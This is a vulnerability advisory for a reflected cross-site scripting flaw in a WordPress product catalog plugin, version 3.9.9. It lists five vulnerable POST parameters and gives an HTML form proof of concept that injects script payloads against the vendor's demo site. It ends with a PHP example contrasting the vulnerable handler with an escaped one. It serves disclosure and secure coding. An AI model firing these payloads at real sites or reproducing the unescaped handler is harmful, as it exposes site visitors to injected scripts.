Product Catalog [Reflected XSS]
Description
The plugin registers the shortcodes product-catalogue and product-catalog. Both of them call the \Insert_Product_Catalog() function, which is responsible for displaying the actual markup on the product catalog pages. This function doesn't properly handle user input, allowing the injection of HTML elements into the rendered output.
Vulnerable parameters are:
$_POST['current_page']
$_POST['categories']
$_POST['sub-categories']
$_POST['prod_name']
$_POST['tags']
The payload is injectable in various frontend catalog pages such as the list view, the single product view, etc. The same injection is also possible through the AJAX action update_catalogue, as described in DWF-2016-87108.
PoC
<form action="http://www.etoilewebdesign.com/ultimate-product-catalogue-demo/" method="post">
<input type="hidden" name="current_page" value="'><script>alert(/current_page/)</script><br" />
<input type="hidden" name="categories" value="'><script>alert(/categories/)</script><br" />
<input type="hidden" name="sub-categories" value="'><script>alert(/sub-categories/)</script><br" />
<input type="hidden" name="tags" value="'><script>alert(/tags/)</script><br" />
<input type="hidden" name="prod_name" value="'><script>alert(/prod_name/)</script><br" />
<input type="submit" id="submit-btn" value="Click Me!" />
</form>
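To show the class of defect behind the PoC above, here is an added illustration (not the plugin's own code; function and variable names are hypothetical) of a shortcode handler that reflects POST parameters into markup, first unescaped and then hardened with type validation and context-appropriate escaping. It assumes WordPress's esc_attr() and wp_unslash(), with stand-ins so the file also runs outside WordPress.

```php
<?php
// Added illustration, not the plugin's code: a handler that echoes POST values
// into HTML attributes, shown in a vulnerable and a hardened form.

// Stand-ins so this runs outside WordPress; inside WordPress the real
// esc_attr() and wp_unslash() are used instead.
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8' );
    }
}
if ( ! function_exists( 'wp_unslash' ) ) {
    function wp_unslash( $value ) {
        return stripslashes( (string) $value );
    }
}

// Vulnerable pattern: the raw POST value is concatenated into a single-quoted
// attribute, so a value like '><script>...</script><br closes the attribute
// and injects its own elements into the page.
function render_catalog_filters_vulnerable( array $post ) {
    $page     = isset( $post['current_page'] ) ? $post['current_page'] : '1';
    $category = isset( $post['categories'] ) ? $post['categories'] : '';
    return "<input type=\"hidden\" name=\"current_page\" value='" . $page . "' />"
         . "<input type=\"hidden\" name=\"categories\" value='" . $category . "' />";
}

// Hardened pattern: enforce the expected type where one exists (a page number
// is a positive integer) and escape everything else for the attribute context.
function render_catalog_filters_hardened( array $post ) {
    $page     = isset( $post['current_page'] ) ? max( 1, (int) $post['current_page'] ) : 1;
    $category = isset( $post['categories'] ) ? wp_unslash( $post['categories'] ) : '';
    return '<input type="hidden" name="current_page" value="' . esc_attr( (string) $page ) . '" />'
         . '<input type="hidden" name="categories" value="' . esc_attr( $category ) . '" />';
}

// Constructed sample input with the same shape as the PoC payload.
$sample = array(
    'current_page' => "'><script>alert(/current_page/)</script><br",
    'categories'   => "'><script>alert(/categories/)</script><br",
);
echo render_catalog_filters_vulnerable( $sample ), PHP_EOL; // script elements reach the page
echo render_catalog_filters_hardened( $sample ), PHP_EOL;   // page becomes 1, category is escaped text
```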
INFO
- Date: 29 July 2016
- Author: Pan Vag
- Vendor: www.etoilewebdesign.com
- Plugin: Product Catalog
- Version: 3.9.9
- WordPress 4.5.2
- ID: DWF-2016-87109